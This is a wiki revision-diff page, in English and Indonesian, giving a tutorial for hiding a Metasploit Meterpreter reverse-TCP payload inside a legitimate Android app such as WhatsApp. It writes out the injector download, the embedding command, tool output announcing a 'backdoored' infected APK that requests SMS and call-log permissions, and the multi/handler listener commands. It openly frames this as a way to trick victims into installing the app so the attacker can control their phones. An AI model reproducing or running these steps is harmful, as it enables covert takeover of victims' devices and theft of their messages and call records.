Difference between revisions of "MSF: Embed MSF exploit di ori apk"

From OnnoWiki
Jump to navigation Jump to search
 
(15 intermediate revisions by the same user not shown)
Line 2: Line 2:
  
  
Hi Fellas! I’m sure most of you, or at least those who have set a foot in the kingdom of hacking, have heard of Metasploit. Don’t be disappointed if you haven’t, because you’re in the right track.
+
'''WARNING:''' Script apk-payload-injector tampaknya tidak bisa dipakai, lebih baik pakai msfvenom
  
From Wikipedia,
 
  
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
+
Salah satu masalah dalam teknik serangan ke android adalah bagaimana caranya supaya payload serangan yang kita buat menggunakan meterpreter di metasploit menjadi serasa aplikasi yang sah dan akan di install oleh korban. Untuk itu kita perlu meng-embed payload yang kita buat menggunakan metasploit ke aplikasi yang sah.
  
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
+
==PRE-REQUISTICS==
  
In a more informal language, it’s a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is the ‘Meterpreter’, which also has an Android version that comes as an .apk file. In case you are wondering what a payload is,  it’s a program we can install on a victim’s system to compromise it. Normally we have to install the Meterpreter payload in the victims phone by any means [Usually involving Social Engineering], and when the victim runs the application, we would get a direct connection to that phone remotely and we can use it to wreak havoc on it.
+
* Siapkan laptop / VM dengan kali linux.
 +
* tool yang digunakan apktool
 +
* Install
  
But since the payload app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.
+
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
 +
apt-get update
  
Here’s where this tutorial comes in. I’m gonna show you how to take any .apk file, be it WhatsApp or Amazon or SnapChat, and embed the Meterpreter payload in that apk. To the victim it will look and behave exactly as the original app, so he will use it regularly without any doubt, letting you do anything you want to his phone.
+
apt-get install libstdc++6 libncurses5 libz1
  
==PRE-REQUISTICS:==
+
* Siapkan debugkey
  
Just to be clear, In this tutorial the operating system used is Kali Linux, which is a de facto standard OS for Penetration Testing (Read, hacking). You should also install the latest version of ‘ApkTool’ and some libraries for the scripts to work properly.
+
  mkdir -p ~/.android
 +
keytool -genkey -v -keystore ~/.android/debug.keystore -alias androiddebugkey -storepass android -keypass android -keyalg RSA -keysize 2048 -validity 10000 -dname "CN=Android Debug,O=Android,C=US"
  
To install the required libraries, enter this command at the console:
+
==STEP 1:==
 +
 
 +
* Cari apk orgininal
 +
* Keyword google "app_name apk download", misalnya "whatsapp apk download"
 +
 
 +
===Untuk WhatsApp apk===
 +
 
 +
* Masuk ke
  
  apt-get install lib32stdc++6 lib32ncurses5 lib32z1
+
  http://www.androidapksfree.com/apk/whatsapp-apk-latest-version-download/
 +
http://pollux.androidapksfree.com/polluxdata/6cc0605e4a0f974c583e1d506a5f538e/com.whatsapp_v2.17.200-451830_Android-4.0.apk
  
And to get the latest version of ApkTool, head over to this site and follow the installation instructions.
+
* filenya adalah
  
==STEP 1:==
+
com.whatsapp_v2.17.200-451830_Android-4.0.apk
  
First of all grab the original apk from any of the numerous websites available. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in any folder, in this tutorial I will use the Root folder and a WhatApp.apk as example.
 
  
 
==STEP 2:==
 
==STEP 2:==
  
Download the Ruby script from this link and save it in the same folder as that of the original apk.
+
Download Ruby script dari
  
==STEP 3:==
+
https://github.com/SkullTech/apk-payload-injector
  
Open a terminal, and type the following command:
+
atau menggunakan CLI
  
  ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
+
  wget https://github.com/SkullTech/apk-payload-injector/archive/master.zip
 +
unzip master.zip
  
In this example I’ve used 192.168.0.104 as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you. Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.
+
Simpan apk & script ruby di folder yang sama
  
NOTE – If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the LHOST option. You also may need to forward the port you’re using for this attack to work properly.
+
mv com.whatsapp_v2.17.200-451830_Android-4.0.apk apk-payload-injector-master/
  
Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more than often it cannot determine to which Activity of the app it should bind the payload to, so it asks you to select it. In that case, leave the terminal open with the script at the prompt, and browse to /root/original.
+
==STEP 3:==
  
Then open the AndroidManifest.xml file using any text editor you like and look for an <activity> tag which contains both the texts ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for the ‘android:name’ attribute of that tag and from there, note the name of that Activity.
+
Di CLI Kali Linux, cek IP kali linux (Misalnya 192.168.0.104)
  
At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.
+
ifconfig -a
  
This is the hardest step of all, so I’m posting some screenshots to make your life easier.
+
Di CLI Kali Linux, emmbed meterpreter ke apk
  
Screenshot from 2015-12-12 01-44-01Screenshot from 2015-12-12 01-43-27
+
cd apk-payload-injector-master/
 +
ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
  
==PROFIT?!:==
+
cd apk-payload-injector-master/
 +
ruby apk-embed-payload.rb com.whatsapp_v2.17.200-451830_Android-4.0.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
  
If you did everything correctly, you should now get a apk file in your root directory with the name ‘backdoored_WhatsApp.apk’. It will install and run just like the original app.
 
  
As for the listener, you should use multi/handler and set the corresponding options accordingly. Just run the following commands.
+
Akan keluar kira-kira,
  
  msfconsole
+
  [*] Generating msfvenom payload..
  use multi/handler
+
[*] Signing payload..
  set PAYLOAD android/meterpreter/reverse_tcp
+
[*] Decompiling orignal APK..
  set LHOST 192.168.0.104
+
  [*] Decompiling payload APK..
  set LPORT 4895
+
[*] Locating onCreate() hook..
  exploit
+
[*] Copying payload files..
 +
[*] Loading original/smali/com/whatsapp/Main.smali and injecting payload..
 +
[*] Poisoning the manifest with meterpreter permissions..
 +
  [*] Adding android.permission.CALL_PHONE
 +
[*] Adding android.permission.READ_SMS
 +
[*] Adding android.permission.SET_WALLPAPER
 +
[*] Adding android.permission.READ_CALL_LOG
 +
[*] Adding android.permission.WRITE_CALL_LOG
 +
  [*] Rebuilding com.whatsapp_v2.17.200-451830_Android-4.0.apk with meterpreter injection as com_backdoored.apk..
 +
  [*] Signing com_backdoored.apk ..
 +
  [+] Infected file com_backdoored.apk ready.
  
Now wait for the victim to run the app, when he does it, you will get a Meterpreter prompt in the terminal!
+
Nama file
  
Screenshot from 2015-12-18 14:32:55
+
com_backdoored.apk
  
==NOTE:==
+
Kalau anda kurang beruntung, kemungkinan payload-injector tidak bisa menemukan Activity yang harus dia bind. Untuk itu kita perlu membuka folder
  
You must have noticed I haven’t explained anything, rather asked you to blindly follow. As none of us wants to be a script-kiddie, we will learn how to do this manually in the next article. To be honest, I didn’t know how to successfully implement this until I found this script. After I saw that this script does what it promises, I learned the process by reverse-engineering it. Let us set that story apart for another article.
+
original
  
If you face any problem, don’t forget to mention it in the comments. I’ll try to help you in any way I can.
+
Lakukan,
  
==CREDITS:==
+
* Buka / edit AndroidManifest.xml
 +
* Cari <activity> tag yang berisi text ‘.MAIN’ dan ‘.LAUNCHER’.
 +
* Cari attribute ‘android:name’ dari sit, catat nama dari Activity.
 +
* Ulangi lagi proses-nya, jika ruby script menanyakan Activitynya, masukan nomor yang terkait dengan Activity name yang anda catat sebelumnya dan press ENTER.
  
I found the script from the comments section of a thread in NullByte, so thanks to the guy who shared it, I’m sorry I don’t remember which thread it was or who the guy was. And credit of making this script goes to timwr and Jack64.
+
==PROFIT?!:==
  
 +
Di kali linux CLI, ketik
  
 +
msfconsole
  
 +
masuk ke
  
 +
use multi/handler
 +
set PAYLOAD android/meterpreter/reverse_tcp
 +
set LHOST 192.168.0.104
 +
set LPORT 4895
 +
exploit
  
 +
Tunggu sampai android korban berkomunikasi
  
  

Latest revision as of 13:26, 1 June 2017

sumber: https://techkernel.org/2015/12/11/embed-metasploit-payload-in-apk-easily/


WARNING: Script apk-payload-injector tampaknya tidak bisa dipakai, lebih baik pakai msfvenom


Salah satu masalah dalam teknik serangan ke android adalah bagaimana caranya supaya payload serangan yang kita buat menggunakan meterpreter di metasploit menjadi serasa aplikasi yang sah dan akan di install oleh korban. Untuk itu kita perlu meng-embed payload yang kita buat menggunakan metasploit ke aplikasi yang sah.

PRE-REQUISTICS

  • Siapkan laptop / VM dengan kali linux.
  • tool yang digunakan apktool
  • Install
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
apt-get update
apt-get install libstdc++6 libncurses5 libz1
  • Siapkan debugkey
mkdir -p ~/.android
keytool -genkey -v -keystore ~/.android/debug.keystore -alias androiddebugkey -storepass android -keypass android -keyalg RSA -keysize 2048 -validity 10000 -dname "CN=Android Debug,O=Android,C=US"

STEP 1:

  • Cari apk orgininal
  • Keyword google "app_name apk download", misalnya "whatsapp apk download"

Untuk WhatsApp apk

  • Masuk ke
http://www.androidapksfree.com/apk/whatsapp-apk-latest-version-download/
http://pollux.androidapksfree.com/polluxdata/6cc0605e4a0f974c583e1d506a5f538e/com.whatsapp_v2.17.200-451830_Android-4.0.apk
  • filenya adalah
com.whatsapp_v2.17.200-451830_Android-4.0.apk


STEP 2:

Download Ruby script dari

https://github.com/SkullTech/apk-payload-injector

atau menggunakan CLI

wget https://github.com/SkullTech/apk-payload-injector/archive/master.zip
unzip master.zip

Simpan apk & script ruby di folder yang sama

mv com.whatsapp_v2.17.200-451830_Android-4.0.apk apk-payload-injector-master/

STEP 3:

Di CLI Kali Linux, cek IP kali linux (Misalnya 192.168.0.104)

ifconfig -a

Di CLI Kali Linux, emmbed meterpreter ke apk

cd apk-payload-injector-master/
ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
cd apk-payload-injector-master/
ruby apk-embed-payload.rb com.whatsapp_v2.17.200-451830_Android-4.0.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895


Akan keluar kira-kira,

[*] Generating msfvenom payload..
[*] Signing payload..
[*] Decompiling orignal APK..
[*] Decompiling payload APK..
[*] Locating onCreate() hook..
[*] Copying payload files..
[*] Loading original/smali/com/whatsapp/Main.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding com.whatsapp_v2.17.200-451830_Android-4.0.apk with meterpreter injection as com_backdoored.apk..
[*] Signing com_backdoored.apk ..
[+] Infected file com_backdoored.apk ready.

Nama file

com_backdoored.apk

Kalau anda kurang beruntung, kemungkinan payload-injector tidak bisa menemukan Activity yang harus dia bind. Untuk itu kita perlu membuka folder

original

Lakukan,

  • Buka / edit AndroidManifest.xml
  • Cari <activity> tag yang berisi text ‘.MAIN’ dan ‘.LAUNCHER’.
  • Cari attribute ‘android:name’ dari sit, catat nama dari Activity.
  • Ulangi lagi proses-nya, jika ruby script menanyakan Activitynya, masukan nomor yang terkait dengan Activity name yang anda catat sebelumnya dan press ENTER.

PROFIT?!:

Di kali linux CLI, ketik

msfconsole

masuk ke

use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

Tunggu sampai android korban berkomunikasi


Referensi